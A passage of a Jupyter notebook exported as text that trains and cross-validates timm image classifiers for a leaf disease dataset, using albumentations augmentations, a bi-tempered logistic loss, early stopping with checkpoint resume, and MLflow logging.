Compose, OneOf, Normalize, Resize, RandomResizedCrop, RandomCrop, HorizontalFlip, VerticalFlip,
RandomBrightness, RandomContrast, RandomBrightnessContrast, Rotate, ShiftScaleRotate, Cutout,
IAAAdditiveGaussianNoise, Transpose
)
from albumentations.pytorch import ToTensorV2
from albumentations import ImageOnlyTransform
import timm
import mlflow
import warnings
warnings.filterwarnings('ignore')
if CFG['apex']:
    from apex import amp
# fall back to CPU only while debugging; otherwise a GPU is assumed
if CFG['debug']:
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
else:
    device = torch.device('cuda')
start_time = datetime.datetime.now()
start_time_str = start_time.strftime('%m%d%H%M')
###Output
_____no_output_____
###Markdown
Directory settings
###Code
# ====================================================
# Directory settings
# ====================================================
# reset the output directory on every run
if os.path.exists(OUTPUT_DIR):
    shutil.rmtree(OUTPUT_DIR)
os.makedirs(OUTPUT_DIR)
###Output
_____no_output_____
###Markdown
save basic files
###Code
# with open(f'{OUTPUT_DIR}/{start_time_str}_TAG.json', 'w') as f:
# json.dump(TAG, f, indent=4)
# with open(f'{OUTPUT_DIR}/{start_time_str}_CFG.json', 'w') as f:
# json.dump(CFG, f, indent=4)
import shutil
notebook_path = f'{OUTPUT_DIR}/{start_time_str}_{TITLE}.ipynb'
shutil.copy2(NOTEBOOK_PATH, notebook_path)
###Output
_____no_output_____
###Markdown
Data Loading
###Code
train = pd.read_csv(f'{DATA_PATH}/train.csv')
test = pd.read_csv(f'{DATA_PATH}/sample_submission.csv')
label_map = pd.read_json(f'{DATA_PATH}/label_num_to_disease_map.json',
orient='index')
if CFG['debug']:
train = train.sample(n=1000, random_state=CFG['seed']).reset_index(drop=True)
###Output
_____no_output_____
###Markdown
Utils
###Code
# ====================================================
# Utils
# ====================================================
def get_score(y_true, y_pred):
return accuracy_score(y_true, y_pred)
@contextmanager
def timer(name):
t0 = time.time()
LOGGER.info(f'[{name}] start')
yield
LOGGER.info(f'[{name}] done in {time.time() - t0:.0f} s.')
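# Usage sketch (commented out; DATA_PATH is defined earlier in the notebook):
# with timer('load train.csv'):
#     _ = pd.read_csv(f'{DATA_PATH}/train.csv')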
def init_logger(log_file=OUTPUT_DIR+'train.log'):
from logging import getLogger, INFO, FileHandler, Formatter, StreamHandler
logger = getLogger(__name__)
logger.setLevel(INFO)
handler1 = StreamHandler()
handler1.setFormatter(Formatter("%(message)s"))
handler2 = FileHandler(filename=log_file)
handler2.setFormatter(Formatter("%(message)s"))
logger.addHandler(handler1)
logger.addHandler(handler2)
return logger
logger_path = OUTPUT_DIR+f'{start_time_str}_train.log'
LOGGER = init_logger(logger_path)
def seed_torch(seed=42):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
seed_torch(seed=CFG['seed'])
class EarlyStopping:
"""Early stops the training if validation loss doesn't improve after a given patience."""
def __init__(self, patience=7, verbose=False, save_path='checkpoint.pt',
counter=0, best_score=None, save_latest_path=None):
"""
Args:
patience (int): How long to wait after last time validation loss improved.
Default: 7
verbose (bool): If True, prints a message for each validation loss improvement.
Default: False
save_path (str): Directory for saving a model.
Default: "'checkpoint.pt'"
"""
self.patience = patience
self.verbose = verbose
self.save_path = save_path
self.counter = counter
self.best_score = best_score
self.save_latest_path = save_latest_path
self.early_stop = False
self.val_loss_min = np.Inf
def __call__(self, val_loss, model, preds, epoch):
score = -val_loss
if self.best_score is None:
self.best_score = score
self.save_checkpoint(val_loss, model, preds, epoch)
if self.save_latest_path is not None:
self.save_latest(val_loss, model, preds, epoch, score)
elif score >= self.best_score:
self.counter = 0
self.best_score = score
self.save_checkpoint(val_loss, model, preds, epoch)
if self.save_latest_path is not None:
self.save_latest(val_loss, model, preds, epoch, score)
        # stop training immediately if the score becomes NaN
elif math.isnan(score):
self.early_stop = True
else:
self.counter += 1
if self.save_latest_path is not None:
self.save_latest(val_loss, model, preds, epoch, score)
if self.verbose:
print(f'EarlyStopping counter: {self.counter} out of {self.patience}')
if self.counter >= self.patience:
self.early_stop = True
def save_checkpoint(self, val_loss, model, preds, epoch):
        '''Saves the model when the validation loss decreases.'''
if self.verbose:
print(f'Validation loss decreased ({self.val_loss_min:.10f} --> {val_loss:.10f}). Saving model ...')
torch.save({'model': model.state_dict(), 'preds': preds,
'epoch' : epoch, 'best_score' : self.best_score, 'counter' : self.counter},
self.save_path)
self.val_loss_min = val_loss
def save_latest(self, val_loss, model, preds, epoch, score):
'''Saves latest model.'''
torch.save({'model': model.state_dict(), 'preds': preds,
'epoch' : epoch, 'score' : score, 'counter' : self.counter},
self.save_latest_path)
self.val_loss_min = val_loss
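# Usage sketch (train_loop below drives this object): call it once per epoch
# with the validation loss; it checkpoints on improvement and sets
# `early_stop` after `patience` epochs without one.
# early_stopping = EarlyStopping(patience=CFG['early_stopping_round'],
#                                save_path='best.pth')
# early_stopping(avg_val_loss, model, preds, epoch)
# if early_stopping.early_stop: ...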
###Output
_____no_output_____
###Markdown
CV split
###Code
folds = train.copy()
Fold = StratifiedKFold(n_splits=CFG['n_fold'], shuffle=True, random_state=CFG['seed'])
for n, (train_index, val_index) in enumerate(Fold.split(folds, folds[CFG['target_col']])):
folds.loc[val_index, 'fold'] = int(n)
folds['fold'] = folds['fold'].astype(int)
print(folds.groupby(['fold', CFG['target_col']]).size())
###Output
fold label
0 0 218
1 438
2 477
3 2631
4 516
1 0 218
1 438
2 477
3 2631
4 516
2 0 217
1 438
2 477
3 2632
4 515
3 0 217
1 438
2 477
3 2632
4 515
4 0 217
1 437
2 478
3 2632
4 515
dtype: int64
###Markdown
Dataset
###Code
# ====================================================
# Dataset
# ====================================================
class TrainDataset(Dataset):
def __init__(self, df, transform=None):
self.df = df
self.file_names = df['image_id'].values
self.labels = df['label'].values
self.transform = transform
def __len__(self):
return len(self.df)
def __getitem__(self, idx):
file_name = self.file_names[idx]
file_path = f'{DATA_PATH}/train_images/{file_name}'
image = cv2.imread(file_path)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
if self.transform:
augmented = self.transform(image=image)
image = augmented['image']
label = torch.tensor(self.labels[idx]).long()
return image, label
class TestDataset(Dataset):
def __init__(self, df, transform=None):
self.df = df
self.file_names = df['image_id'].values
self.transform = transform
def __len__(self):
return len(self.df)
def __getitem__(self, idx):
file_name = self.file_names[idx]
file_path = f'{DATA_PATH}/test_images/{file_name}'
image = cv2.imread(file_path)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
if self.transform:
augmented = self.transform(image=image)
image = augmented['image']
return image
# train_dataset = TrainDataset(train, transform=None)
# for i in range(1):
# image, label = train_dataset[i]
# plt.imshow(image)
# plt.title(f'label: {label}')
# plt.show()
###Output
_____no_output_____
###Markdown
Transforms
###Code
def _get_augmentations(aug_list):
process = []
for aug in aug_list:
if aug == 'Resize':
process.append(Resize(CFG['size'], CFG['size']))
elif aug == 'RandomResizedCrop':
process.append(RandomResizedCrop(CFG['size'], CFG['size']))
elif aug == 'Transpose':
process.append(Transpose(p=0.5))
elif aug == 'HorizontalFlip':
process.append(HorizontalFlip(p=0.5))
elif aug == 'VerticalFlip':
process.append(VerticalFlip(p=0.5))
elif aug == 'ShiftScaleRotate':
process.append(ShiftScaleRotate(p=0.5))
elif aug == 'Normalize':
process.append(Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225],
))
else:
            raise ValueError(f'{aug} is not a supported augmentation')
process.append(ToTensorV2())
return process
# ====================================================
# Transforms
# ====================================================
def get_transforms(*, data):
if data == 'train':
return Compose(
_get_augmentations(TAG['augmentation'])
)
elif data == 'valid':
return Compose(
_get_augmentations(['Resize', 'Normalize'])
)
# train_dataset = TrainDataset(train, transform=get_transforms(data='train'))
# for i in range(1):
# image, label = train_dataset[i]
# plt.imshow(image[0])
# plt.title(f'label: {label}')
# plt.show()
###Output
_____no_output_____
###Markdown
Bi-tempered logistic loss
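For orientation (this paragraph summarizes the code below): the loss replaces the ordinary $\log$ and $\exp$ with their tempered counterparts $\log_t(u) = \frac{u^{1-t}-1}{1-t}$ and $\exp_t(u) = \left[1 + (1-t)\,u\right]_+^{1/(1-t)}$, both of which reduce to plain $\log$/$\exp$ at $t = 1$. Temperature $t_1 < 1$ makes the loss bounded, while $t_2 > 1$ gives the softmax heavier tails; since $\exp_{t_2}$ no longer normalizes by construction, the partition value is found iteratively.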
###Code
def log_t(u, t):
"""Compute log_t for `u'."""
if t==1.0:
return u.log()
else:
return (u.pow(1.0 - t) - 1.0) / (1.0 - t)
def exp_t(u, t):
"""Compute exp_t for `u'."""
if t==1:
return u.exp()
else:
return (1.0 + (1.0-t)*u).relu().pow(1.0 / (1.0 - t))
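# Hedged sanity check (illustrative, not part of the pipeline): exp_t inverts
# log_t for positive inputs, and both reduce to plain exp/log at t = 1.0.
# u = torch.tensor([0.5, 1.0, 2.0])
# for t in (1.0, 1.3):
#     assert torch.allclose(exp_t(log_t(u, t), t), u, atol=1e-6)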
def compute_normalization_fixed_point(activations, t, num_iters):
"""Returns the normalization value for each example (t > 1.0).
Args:
activations: A multi-dimensional tensor with last dimension `num_classes`.
t: Temperature 2 (> 1.0 for tail heaviness).
num_iters: Number of iterations to run the method.
Return: A tensor of same shape as activation with the last dimension being 1.
"""
mu, _ = torch.max(activations, -1, keepdim=True)
normalized_activations_step_0 = activations - mu
normalized_activations = normalized_activations_step_0
for _ in range(num_iters):
logt_partition = torch.sum(
exp_t(normalized_activations, t), -1, keepdim=True)
normalized_activations = normalized_activations_step_0 * \
logt_partition.pow(1.0-t)
logt_partition = torch.sum(
exp_t(normalized_activations, t), -1, keepdim=True)
normalization_constants = - log_t(1.0 / logt_partition, t) + mu
return normalization_constants
def compute_normalization_binary_search(activations, t, num_iters):
"""Returns the normalization value for each example (t < 1.0).
Args:
activations: A multi-dimensional tensor with last dimension `num_classes`.
t: Temperature 2 (< 1.0 for finite support).
num_iters: Number of iterations to run the method.
Return: A tensor of same rank as activation with the last dimension being 1.
"""
mu, _ = torch.max(activations, -1, keepdim=True)
normalized_activations = activations - mu
effective_dim = \
torch.sum(
(normalized_activations > -1.0 / (1.0-t)).to(torch.int32),
dim=-1, keepdim=True).to(activations.dtype)
shape_partition = activations.shape[:-1] + (1,)
lower = torch.zeros(shape_partition, dtype=activations.dtype, device=activations.device)
upper = -log_t(1.0/effective_dim, t) * torch.ones_like(lower)
for _ in range(num_iters):
logt_partition = (upper + lower)/2.0
sum_probs = torch.sum(
exp_t(normalized_activations - logt_partition, t),
dim=-1, keepdim=True)
update = (sum_probs < 1.0).to(activations.dtype)
lower = torch.reshape(
lower * update + (1.0-update) * logt_partition,
shape_partition)
upper = torch.reshape(
upper * (1.0 - update) + update * logt_partition,
shape_partition)
logt_partition = (upper + lower)/2.0
return logt_partition + mu
class ComputeNormalization(torch.autograd.Function):
"""
Class implementing custom backward pass for compute_normalization. See compute_normalization.
"""
@staticmethod
def forward(ctx, activations, t, num_iters):
if t < 1.0:
normalization_constants = compute_normalization_binary_search(activations, t, num_iters)
else:
normalization_constants = compute_normalization_fixed_point(activations, t, num_iters)
ctx.save_for_backward(activations, normalization_constants)
ctx.t=t
return normalization_constants
@staticmethod
def backward(ctx, grad_output):
activations, normalization_constants = ctx.saved_tensors
t = ctx.t
normalized_activations = activations - normalization_constants
probabilities = exp_t(normalized_activations, t)
escorts = probabilities.pow(t)
escorts = escorts / escorts.sum(dim=-1, keepdim=True)
grad_input = escorts * grad_output
return grad_input, None, None
def compute_normalization(activations, t, num_iters=5):
"""Returns the normalization value for each example.
Backward pass is implemented.
Args:
activations: A multi-dimensional tensor with last dimension `num_classes`.
t: Temperature 2 (> 1.0 for tail heaviness, < 1.0 for finite support).
num_iters: Number of iterations to run the method.
Return: A tensor of same rank as activation with the last dimension being 1.
"""
return ComputeNormalization.apply(activations, t, num_iters)
def tempered_sigmoid(activations, t, num_iters = 5):
"""Tempered sigmoid function.
Args:
activations: Activations for the positive class for binary classification.
t: Temperature tensor > 0.0.
num_iters: Number of iterations to run the method.
Returns:
A probabilities tensor.
"""
internal_activations = torch.stack([activations,
torch.zeros_like(activations)],
dim=-1)
internal_probabilities = tempered_softmax(internal_activations, t, num_iters)
return internal_probabilities[..., 0]
def tempered_softmax(activations, t, num_iters=5):
"""Tempered softmax function.
Args:
activations: A multi-dimensional tensor with last dimension `num_classes`.
t: Temperature > 1.0.
num_iters: Number of iterations to run the method.
Returns:
A probabilities tensor.
"""
if t == 1.0:
return activations.softmax(dim=-1)
normalization_constants = compute_normalization(activations, t, num_iters)
return exp_t(activations - normalization_constants, t)
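# Hedged sanity check: at t = 1.0 this matches the ordinary softmax; for
# t > 1.0 the iterative normalization keeps each row summing to ~1.
# logits = torch.randn(2, 5)
# assert torch.allclose(tempered_softmax(logits, 1.0), logits.softmax(dim=-1))
# print(tempered_softmax(logits, 1.3).sum(dim=-1))  # approximately 1.0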
def bi_tempered_binary_logistic_loss(activations,
labels,
t1,
t2,
label_smoothing = 0.0,
num_iters=5,
reduction='mean'):
"""Bi-Tempered binary logistic loss.
Args:
activations: A tensor containing activations for class 1.
labels: A tensor with shape as activations, containing probabilities for class 1
t1: Temperature 1 (< 1.0 for boundedness).
t2: Temperature 2 (> 1.0 for tail heaviness, < 1.0 for finite support).
label_smoothing: Label smoothing
num_iters: Number of iterations to run the method.
Returns:
A loss tensor.
"""
internal_activations = torch.stack([activations,
torch.zeros_like(activations)],
dim=-1)
internal_labels = torch.stack([labels.to(activations.dtype),
1.0 - labels.to(activations.dtype)],
dim=-1)
return bi_tempered_logistic_loss(internal_activations,
internal_labels,
t1,
t2,
label_smoothing = label_smoothing,
num_iters = num_iters,
reduction = reduction)
def bi_tempered_logistic_loss(activations,
labels,
t1,
t2,
label_smoothing=0.0,
num_iters=5,
reduction = 'mean'):
"""Bi-Tempered Logistic Loss.
Args:
activations: A multi-dimensional tensor with last dimension `num_classes`.
labels: A tensor with shape and dtype as activations (onehot),
or a long tensor of one dimension less than activations (pytorch standard)
t1: Temperature 1 (< 1.0 for boundedness).
t2: Temperature 2 (> 1.0 for tail heaviness, < 1.0 for finite support).
label_smoothing: Label smoothing parameter between [0, 1). Default 0.0.
num_iters: Number of iterations to run the method. Default 5.
reduction: ``'none'`` | ``'mean'`` | ``'sum'``. Default ``'mean'``.
``'none'``: No reduction is applied, return shape is shape of
activations without the last dimension.
``'mean'``: Loss is averaged over minibatch. Return shape (1,)
``'sum'``: Loss is summed over minibatch. Return shape (1,)
Returns:
A loss tensor.
"""
if len(labels.shape)<len(activations.shape): #not one-hot
labels_onehot = torch.zeros_like(activations)
labels_onehot.scatter_(1, labels[..., None], 1)
else:
labels_onehot = labels
if label_smoothing > 0:
num_classes = labels_onehot.shape[-1]
labels_onehot = ( 1 - label_smoothing * num_classes / (num_classes - 1) ) \
* labels_onehot + \
label_smoothing / (num_classes - 1)
probabilities = tempered_softmax(activations, t2, num_iters)
loss_values = labels_onehot * log_t(labels_onehot + 1e-10, t1) \
- labels_onehot * log_t(probabilities, t1) \
- labels_onehot.pow(2.0 - t1) / (2.0 - t1) \
+ probabilities.pow(2.0 - t1) / (2.0 - t1)
loss_values = loss_values.sum(dim = -1) #sum over classes
if reduction == 'none':
return loss_values
if reduction == 'sum':
return loss_values.sum()
if reduction == 'mean':
return loss_values.mean()
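# Minimal usage sketch (t1/t2 values illustrative): activations are raw logits
# of shape (batch, num_classes); integer labels are one-hot encoded internally.
# acts = torch.randn(4, CFG['target_size'])
# targets = torch.randint(0, CFG['target_size'], (4,))
# print(bi_tempered_logistic_loss(acts, targets, t1=0.8, t2=1.2))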
###Output
_____no_output_____
###Markdown
MODEL
###Code
# ====================================================
# MODEL
# ====================================================
class CustomModel(nn.Module):
def __init__(self, model_name, pretrained=False):
super().__init__()
self.model = timm.create_model(model_name, pretrained=pretrained)
if hasattr(self.model, 'classifier'):
n_features = self.model.classifier.in_features
self.model.classifier = nn.Linear(n_features, CFG['target_size'])
elif hasattr(self.model, 'fc'):
n_features = self.model.fc.in_features
self.model.fc = nn.Linear(n_features, CFG['target_size'])
def forward(self, x):
x = self.model(x)
return x
model = CustomModel(model_name=TAG['model_name'], pretrained=False)
train_dataset = TrainDataset(train, transform=get_transforms(data='train'))
train_loader = DataLoader(train_dataset, batch_size=4, shuffle=True,
num_workers=4, pin_memory=True, drop_last=True)
for image, label in train_loader:
output = model(image)
print(output)
break
###Output
tensor([[ 0.0580, -0.0301, -0.0442, -0.0052, 0.0200],
[-0.7939, 0.2998, 0.3610, -0.0214, -0.2829],
[ 0.0389, 0.0104, 0.0070, -0.0092, 0.0260],
[ 0.0650, -0.0144, -0.0336, -0.0112, 0.0293]],
grad_fn=<AddmmBackward>)
###Markdown
Helper functions
###Code
# ====================================================
# Helper functions
# ====================================================
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
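# Usage: meter.update(loss.item(), batch_size) once per step; meter.avg then
# holds the sample-weighted running mean reported in the training logs below.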
def asMinutes(s):
m = math.floor(s / 60)
s -= m * 60
return '%dm %ds' % (m, s)
def timeSince(since, percent):
now = time.time()
s = now - since
es = s / (percent)
rs = es - s
return '%s (remain %s)' % (asMinutes(s), asMinutes(rs))
# ====================================================
# loss
# ====================================================
def get_loss(criterion, y_preds, labels):
if TAG['criterion']=='CrossEntropyLoss':
loss = criterion(y_preds, labels)
elif TAG['criterion'] == 'bi_tempered_logistic_loss':
loss = criterion(y_preds, labels, t1=CFG['bi_tempered_loss_t1'], t2=CFG['bi_tempered_loss_t2'])
return loss
# ====================================================
# Helper functions
# ====================================================
def train_fn(train_loader, model, criterion, optimizer, epoch, scheduler, device):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
scores = AverageMeter()
# switch to train mode
model.train()
start = end = time.time()
global_step = 0
for step, (images, labels) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
images = images.to(device)
labels = labels.to(device)
batch_size = labels.size(0)
y_preds = model(images)
loss = get_loss(criterion, y_preds, labels)
# record loss
losses.update(loss.item(), batch_size)
if CFG['gradient_accumulation_steps'] > 1:
loss = loss / CFG['gradient_accumulation_steps']
if CFG['apex']:
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
grad_norm = torch.nn.utils.clip_grad_norm_(model.parameters(), CFG['max_grad_norm'])
if (step + 1) % CFG['gradient_accumulation_steps'] == 0:
optimizer.step()
optimizer.zero_grad()
global_step += 1
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if step % CFG['print_freq'] == 0 or step == (len(train_loader)-1):
print('Epoch: [{0}][{1}/{2}] '
'Data {data_time.val:.3f} ({data_time.avg:.3f}) '
'Elapsed {remain:s} '
'Loss: {loss.val:.4f}({loss.avg:.4f}) '
'Grad: {grad_norm:.4f} '
#'LR: {lr:.6f} '
.format(
epoch+1, step, len(train_loader), batch_time=batch_time,
data_time=data_time, loss=losses,
remain=timeSince(start, float(step+1)/len(train_loader)),
grad_norm=grad_norm,
#lr=scheduler.get_lr()[0],
))
return losses.avg
def valid_fn(valid_loader, model, criterion, device):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
scores = AverageMeter()
# switch to evaluation mode
model.eval()
preds = []
start = end = time.time()
for step, (images, labels) in enumerate(valid_loader):
# measure data loading time
data_time.update(time.time() - end)
images = images.to(device)
labels = labels.to(device)
batch_size = labels.size(0)
# compute loss
with torch.no_grad():
y_preds = model(images)
loss = get_loss(criterion, y_preds, labels)
losses.update(loss.item(), batch_size)
# record accuracy
preds.append(y_preds.softmax(1).to('cpu').numpy())
if CFG['gradient_accumulation_steps'] > 1:
loss = loss / CFG['gradient_accumulation_steps']
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if step % CFG['print_freq'] == 0 or step == (len(valid_loader)-1):
print('EVAL: [{0}/{1}] '
'Data {data_time.val:.3f} ({data_time.avg:.3f}) '
'Elapsed {remain:s} '
'Loss: {loss.val:.4f}({loss.avg:.4f}) '
.format(
step, len(valid_loader), batch_time=batch_time,
data_time=data_time, loss=losses,
remain=timeSince(start, float(step+1)/len(valid_loader)),
))
predictions = np.concatenate(preds)
return losses.avg, predictions
def inference(model, states, test_loader, device):
model.to(device)
tk0 = tqdm(enumerate(test_loader), total=len(test_loader))
probs = []
for i, (images) in tk0:
images = images.to(device)
avg_preds = []
for state in states:
            # checkpoints are saved as dicts (see EarlyStopping.save_checkpoint),
            # so load the 'model' entry rather than the raw checkpoint
            model.load_state_dict(state['model'])
model.eval()
with torch.no_grad():
y_preds = model(images)
avg_preds.append(y_preds.softmax(1).to('cpu').numpy())
avg_preds = np.mean(avg_preds, axis=0)
probs.append(avg_preds)
probs = np.concatenate(probs)
return probs
###Output
_____no_output_____
###Markdown
Train loop
###Code
# ====================================================
# scheduler
# ====================================================
def get_scheduler(optimizer):
if TAG['scheduler']=='ReduceLROnPlateau':
scheduler = ReduceLROnPlateau(optimizer, mode='min', factor=CFG['factor'], patience=CFG['patience'], verbose=True, eps=CFG['eps'])
elif TAG['scheduler']=='CosineAnnealingLR':
scheduler = CosineAnnealingLR(optimizer, T_max=CFG['T_max'], eta_min=CFG['min_lr'], last_epoch=-1)
elif TAG['scheduler']=='CosineAnnealingWarmRestarts':
scheduler = CosineAnnealingWarmRestarts(optimizer, T_0=CFG['T_0'], T_mult=1, eta_min=CFG['min_lr'], last_epoch=-1)
return scheduler
# ====================================================
# criterion
# ====================================================
def get_criterion():
if TAG['criterion']=='CrossEntropyLoss':
criterion = nn.CrossEntropyLoss()
elif TAG['criterion'] == 'bi_tempered_logistic_loss':
criterion = bi_tempered_logistic_loss
return criterion
# ====================================================
# Train loop
# ====================================================
def train_loop(folds, fold):
LOGGER.info(f"========== fold: {fold} training ==========")
if not CFG['debug']:
mlflow.set_tag('running.fold', str(fold))
# ====================================================
# loader
# ====================================================
trn_idx = folds[folds['fold'] != fold].index
val_idx = folds[folds['fold'] == fold].index
train_folds = folds.loc[trn_idx].reset_index(drop=True)
valid_folds = folds.loc[val_idx].reset_index(drop=True)
train_dataset = TrainDataset(train_folds,
transform=get_transforms(data='train'))
valid_dataset = TrainDataset(valid_folds,
transform=get_transforms(data='valid'))
train_loader = DataLoader(train_dataset,
batch_size=CFG['batch_size'],
shuffle=True,
num_workers=CFG['num_workers'], pin_memory=True, drop_last=True)
valid_loader = DataLoader(valid_dataset,
batch_size=CFG['batch_size'],
shuffle=False,
num_workers=CFG['num_workers'], pin_memory=True, drop_last=False)
# ====================================================
# model & optimizer & criterion
# ====================================================
best_model_path = OUTPUT_DIR+f'{TAG["model_name"]}_fold{fold}_best.pth'
latest_model_path = OUTPUT_DIR+f'{TAG["model_name"]}_fold{fold}_latest.pth'
model = CustomModel(TAG['model_name'], pretrained=True)
model.to(device)
    # resume from intermediate weights if a 'latest' checkpoint exists
if os.path.isfile(latest_model_path):
state_latest = torch.load(latest_model_path)
state_best = torch.load(best_model_path)
model.load_state_dict(state_latest['model'])
epoch_start = state_latest['epoch']+1
# er_best_score = state_latest['score']
er_counter = state_latest['counter']
er_best_score = state_best['best_score']
LOGGER.info(f'Retrain model in epoch:{epoch_start}, best_score:{er_best_score:.3f}, counter:{er_counter}')
    # # for the case where only the best checkpoint was saved (remove later)
# elif os.path.isfile(best_model_path):
# state_best = torch.load(best_model_path)
# model.load_state_dict(state_best['model'])
# epoch_start = state_best['epoch']+1
# # er_best_score = state_latest['score']
# er_counter = state_best['counter']
# er_best_score = state_best['best_score']
# LOGGER.info(f'Retrain model in epoch:{epoch_start}, best_score:{er_best_score:.3f}, counter:{er_counter}')
else:
epoch_start = 0
er_best_score = None
er_counter = 0
optimizer = Adam(model.parameters(), lr=CFG['lr'], weight_decay=CFG['weight_decay'], amsgrad=False)
scheduler = get_scheduler(optimizer)
criterion = get_criterion()
# ====================================================
# apex
# ====================================================
if CFG['apex']:
model, optimizer = amp.initialize(model, optimizer, opt_level='O1', verbosity=0)
# ====================================================
# loop
# ====================================================
# best_score = 0.
# best_loss = np.inf
early_stopping = EarlyStopping(
patience=CFG['early_stopping_round'],
verbose=True,
save_path=best_model_path,
counter=er_counter, best_score=er_best_score,
save_latest_path=latest_model_path)
for epoch in range(epoch_start, CFG['epochs']):
start_time = time.time()
# train
avg_loss = train_fn(train_loader, model, criterion, optimizer, epoch, scheduler, device)
# eval
avg_val_loss, preds = valid_fn(valid_loader, model, criterion, device)
valid_labels = valid_folds[CFG['target_col']].values
# early stopping
early_stopping(avg_val_loss, model, preds, epoch)
if early_stopping.early_stop:
print(f'Epoch {epoch+1} - early stopping')
break
        if isinstance(scheduler, ReduceLROnPlateau):
            scheduler.step(avg_val_loss)
        elif isinstance(scheduler, (CosineAnnealingLR, CosineAnnealingWarmRestarts)):
            scheduler.step()
# scoring
score = get_score(valid_labels, preds.argmax(1))
elapsed = time.time() - start_time
LOGGER.info(f'Epoch {epoch+1} - avg_train_loss: {avg_loss:.4f} avg_val_loss: {avg_val_loss:.4f} time: {elapsed:.0f}s')
LOGGER.info(f'Epoch {epoch+1} - Accuracy: {score}')
# log mlflow
if not CFG['debug']:
mlflow.log_metric(f"fold{fold} avg_train_loss", avg_loss, step=epoch)
mlflow.log_metric(f"fold{fold} avg_valid_loss", avg_val_loss, step=epoch)
mlflow.log_metric(f"fold{fold} score", score, step=epoch)
mlflow.log_metric(f"fold{fold} lr", scheduler.get_last_lr()[0], step=epoch)
mlflow.log_artifact(best_model_path)
if os.path.isfile(latest_model_path):
mlflow.log_artifact(latest_model_path)
    check_point = torch.load(best_model_path)
valid_folds[[str(c) for c in range(5)]] = check_point['preds']
valid_folds['preds'] = check_point['preds'].argmax(1)
return valid_folds
# ====================================================
# main
# ====================================================
def get_result(result_df):
preds = result_df['preds'].values
labels = result_df[CFG['target_col']].values
score = get_score(labels, preds)
LOGGER.info(f'Score: {score:<.5f}')
return score
def main():
"""
Prepare: 1.train 2.test 3.submission 4.folds
"""
if CFG['train']:
# train
oof_df = pd.DataFrame()
for fold in range(CFG['n_fold']):
if fold in CFG['trn_fold']:
_oof_df = train_loop(folds, fold)
oof_df = pd.concat([oof_df, _oof_df])
LOGGER.info(f"========== fold: {fold} result ==========")
_ = get_result(_oof_df)
# CV result
LOGGER.info(f"========== CV ==========")
score = get_result(oof_df)
# save result
oof_df.to_csv(OUTPUT_DIR+'oof_df.csv', index=False)
# log mlflow
if not CFG['debug']:
mlflow.log_metric('oof score', score)
mlflow.delete_tag('running.fold')
mlflow.log_artifact(OUTPUT_DIR+'oof_df.csv')
if CFG['inference']:
# inference
model = CustomModel(TAG['model_name'], pretrained=False)
states = [torch.load(OUTPUT_DIR+f'{TAG["model_name"]}_fold{fold}_best.pth') for fold in CFG['trn_fold']]
test_dataset = TestDataset(test, transform=get_transforms(data='valid'))
test_loader = DataLoader(test_dataset, batch_size=CFG['batch_size'], shuffle=False,
num_workers=CFG['num_workers'], pin_memory=True)
predictions = inference(model, states, test_loader, device)
# submission
test['label'] = predictions.argmax(1)
test[['image_id', 'label']].to_csv(OUTPUT_DIR+'submission.csv', index=False)
###Output
_____no_output_____
###Markdown
Rerun: resume an interrupted training run from the saved MLflow state
###Code
def _load_save_point(run_id):
    # Find the fold where the previous run was interrupted
stop_fold = int(mlflow.get_run(run_id=run_id).to_dictionary()['data']['tags']['running.fold'])
    # Restrict training to the folds that still need to run
CFG['trn_fold'] = [fold for fold in CFG['trn_fold'] if fold>=stop_fold]
    # Download any saved .pth model files, including mid-training checkpoints
client = mlflow.tracking.MlflowClient()
artifacts = [artifact for artifact in client.list_artifacts(run_id) if ".pth" in artifact.path]
for artifact in artifacts:
client.download_artifacts(run_id, artifact.path, OUTPUT_DIR)
def check_have_run():
results = mlflow.search_runs(INFO['EXPERIMENT_ID'])
run_id_list = results[results['tags.mlflow.runName']==TITLE]['run_id'].tolist()
    # First execution of this run name
if len(run_id_list) == 0:
run_id = None
    # A run with this name already exists
else:
assert len(run_id_list)==1
run_id = run_id_list[0]
_load_save_point(run_id)
return run_id
if __name__ == '__main__':
if CFG['debug']:
main()
else:
mlflow.set_tracking_uri(INFO['TRACKING_URI'])
mlflow.set_experiment('single model')
        # If a previous run exists, resume from where it left off
run_id = check_have_run()
with mlflow.start_run(run_id=run_id, run_name=TITLE):
if run_id is None:
mlflow.log_artifact(CONFIG_PATH)
mlflow.log_param('device', device)
mlflow.set_tags(TAG)
mlflow.log_params(CFG)
mlflow.log_artifact(notebook_path)
main()
mlflow.log_artifacts(OUTPUT_DIR)
shutil.copytree(OUTPUT_DIR, f'{INFO["SHARE_DRIVE_PATH"]}/{TITLE}')
shutil.copy2(CONFIG_PATH, f'{INFO["SHARE_DRIVE_PATH"]}/{TITLE}/{CONFIG_NAME}')
###Output
========== fold: 4 training ==========
Retrain model in epoch:1, best_score:-0.129, counter:0
1 - Data Science Methodology/2.2 From Modeling to Evaluation.ipynb | ###Markdown
